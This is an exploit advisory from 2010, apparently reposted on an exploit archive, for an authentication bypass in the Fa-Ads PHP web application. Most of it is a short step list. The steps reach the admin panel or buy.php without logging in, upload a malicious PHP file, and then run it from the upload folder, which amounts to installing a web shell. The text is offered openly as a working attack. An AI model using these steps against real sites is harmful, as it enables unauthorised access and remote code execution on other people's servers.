Fa-Ads (Auth Bypass) Vulnerability

Posted on 30 March 2010
==================================
Fa-Ads (Auth Bypass) Vulnerability
==================================

========================================================================================                 
| # Title    : Fa-Ads (Auth Bypass) Vulnerability     
| # Author   : indoushka                                                              
| # email    : indoushka@hotmail.com                                                  
| # Home     : www.iqs3cur1ty.com                                                                             
| # Web Site :
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)      
| # Bug      : (Auth Bypass)                                                                  
======================      Exploit By indoushka       =================================
 # Exploit  :
  
 1 - http://localhost/Fa-Ads/admin/ (Admin Panel)
  
 2 - http://localhost/Fa-Ads/admin/image.php (2 Upload Ev!l)
  
 3 - http://localhost/FaHome/upload/1.php (2 Find Ev!l)
  
 or
  
 1 - http://localhost/Fa-Ads/buy.php (Creat A new)
  
 2 - http://localhost/Fa-Ads//upload/20100328210343.php (2 Find Ev!l)


# Inj3ct0r.com [2010-03-30]
TOP
Malware :

Last 20
Exploits :

Last 20